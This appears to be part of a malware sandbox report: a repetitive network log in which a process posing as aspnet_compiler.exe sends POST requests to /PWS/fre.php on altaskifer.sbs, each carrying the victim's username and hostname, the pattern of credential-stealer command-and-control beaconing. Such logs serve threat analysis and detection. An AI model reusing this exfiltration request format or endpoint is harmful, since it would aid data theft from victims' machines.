                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=he0ktgepTM5aiMG%2F%2B8HVehak34wiMUfvZsS%2FXc51PpRRGO4vOz3GE%2FxsnxehKX94BPJIUurrc3NkzAfsKWJUmnNzZ4qNbWhonqn4%2BYpq9zGjQsCO4CUkGxWQ%2B4A%2BuCXtuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001373fb3b0981-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                116192.168.2.649845172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:03.119856119 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:03.244040012 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:03.618990898 CEST597INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:03 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVwIgVtUbFiLawufMLwLmYKB6XV3oRTzqg%2BhoV9dAsC6YIUAhbEpzgKgzLn7Lam36juHnInS3M45iAYQoX1hkDxownRWPjMUg4C8sTtvw6JAcQyAmZrbyBZ375Hqqt4lzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001378e835a566-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                117192.168.2.649846172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:03.891736984 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:04.015881062 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:04.394763947 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:04 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ikrCw5e52moUqUbpsFXcakEEl%2B3LGkaAKbTb025ozQtPKquEBKh0XgUj0fX0hYGnGy%2BEHS8BMBjEm56TWnyRtEilrFK%2BxYJ4aMycgEJkr%2FM6pt5ul8Qyce%2FohK9h8h9gkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700137dbfd28d9d-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                118192.168.2.649847172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:04.659571886 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:04.784728050 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:05.165330887 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=32P4zlhrYGaP0rvDKGdrPXwiSVAgBfCffSfTgJuMs3dAigo%2B4xZpRAPsgncVmu8ayV%2B%2BtQ96%2FNHq8pSf0SEbMufJKOPZh97mY3MyYwkSpYNs%2Bn%2FdXXRhgG60nfb1QrdtfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013828ead0a32-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                119192.168.2.649848172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:05.441891909 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:05.566822052 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:05.937047005 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkfBdYBCXOx5P6JOvOf0jDTNu1%2FsBOl6UbSQPYkYcdnLClcrBQozTcZfvLcOT3c8HF2pRCaCosNoGI5e90dOmmgBFRhIdU%2FH2wwRVzJtwq0RVBNccZ%2BP2jECULNN1nt0ag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013876ecf288a-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                120192.168.2.649849172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:06.206379890 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:06.331012964 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:06.734194040 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:06 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=caNV5JMwxkvlHrncxe3uP7JgXeIIpfU8qK3z6lmdkHsqsbdF2XkXIMTnVQ7aQxkL6rk%2FJQEG%2BkU%2FT1qw4PuZv1jsl4IzKJzRy0QyYLHN6Q8J2e2waH78%2FclJofQA1Fv1HQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700138c28d1742a-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                121192.168.2.649850172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:06.999341011 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:07.123332977 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:07.492587090 CEST609INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:07 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2FGhWerHES4N4pF5rhJ7F4AxwPyT5JT6qtAB%2BJKSpR8vSx8xEOtrbZ%2B8ozCy87hgbX4VWo%2Bz8S%2FPyH8dmVqQCv22oU%2BIiNLjGCoi82hveMPhQKE8%2FZ3GDuoa0QJdVDbG2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013912d06dab1-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                122192.168.2.649851172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:07.768548965 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:07.892378092 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:08.281070948 CEST597INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:08 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d6XDMawKld1tn5YSGrAigjhZWleh5uvTxkq8a3Hmys7ZzA0EChV9a6%2Fg5G3THPBmEzmv6Plb1jZXA2lIZZQVPAXISr9G0eoTPwlacfZ5a3v8jLg2SkQhS9W4Rs1hAXldrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001395fb283347-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                123192.168.2.649852172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:08.547894955 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:08.671363115 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:09.051033020 CEST599INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:08 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F0p44MuOINGEL1NFOgx0i27x%2FYRAx5kNDDkPweOKYfZLJOETodlL3yGNQVD3QOEUGqGusHfGc0R0GcSy3oBgEAwJtbLBJhXqYbNNmJGDCR%2BOncA2C5HgI1muUmS8jpotCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700139addd0da53-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                124192.168.2.649853172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:09.316932917 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:09.441440105 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:09.810904026 CEST609INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:09 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pu3Ghg%2BD1Ht%2FX8NSoxrraD3BGqFl9hl6W87u7SgNiU2UkgzJkEDZVsRMFu7LO2F7KIxTzw%2F3%2B0eK90K4ECGNqQC%2Bb5hOVmdYxCTbmZJRVAU2BEir4Pl3wjqBrtoN8%2B%2BrBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700139faecfda4f-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                125192.168.2.649855172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:10.080333948 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:10.204709053 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:10.572736979 CEST597INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:10 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SLeAwqloMsUbKvxI3EKaV88FdN7mAsFsxHs6Zaav1rIVuFtSfGo9M5eWWAhuy%2B9L1u2rTkaE86sDlaCRUQqtu7b7fOoqfHXRbDwIeAYKULnF7ECqexB7RRB5yVfglBLSWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013a46ffd8dd6-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                126192.168.2.649856172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:10.846749067 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:10.970324039 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:11.336899042 CEST597INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:11 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YrW8bXs0ZBUSnq1fkFmgXpaakc8r8y4A25I2UTmwC3GyyTlqR5pBomCpcm4NHr3XDN7ZkI1AnYjrL6Yr1QE5esT1KP09A9ltjzmHVmnQEaA7PHmkVBRHS6AZ%2FaQYGcEsKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013a92c184988-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                127192.168.2.649857172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:11.610579014 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:11.734463930 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:12.097577095 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:12 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l9RaApPfE6upeyNuSRf6XD%2FH5saBd60MqGlChSRqyE5QZ5N42dz2ZL84pOTOO4hX%2BHxw53fnqRZJf3vDxTKBeJTd%2FvQxVfYNk9hQwojBY%2FnqzAqshfubzxRFdhfsuXq6AA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013adfc826db6-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                128192.168.2.649858172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:12.357167959 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:12.481923103 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:12.864523888 CEST597INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:12 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2HZE5EwbHDpGHOsELggaPbqHTnAwPc82HKJ3dwDsE0cBcPpXZBDGChTThoUJMI28Rq5R4mA65wFnl01RvjZ25JBoVjw1McHIM7RTia%2B4NuijPZXTTNAtOEard7FLQEegBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013b2a8b9a575-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                129192.168.2.649859172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:13.117985964 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:13.242110014 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:13.639862061 CEST597INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:13 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
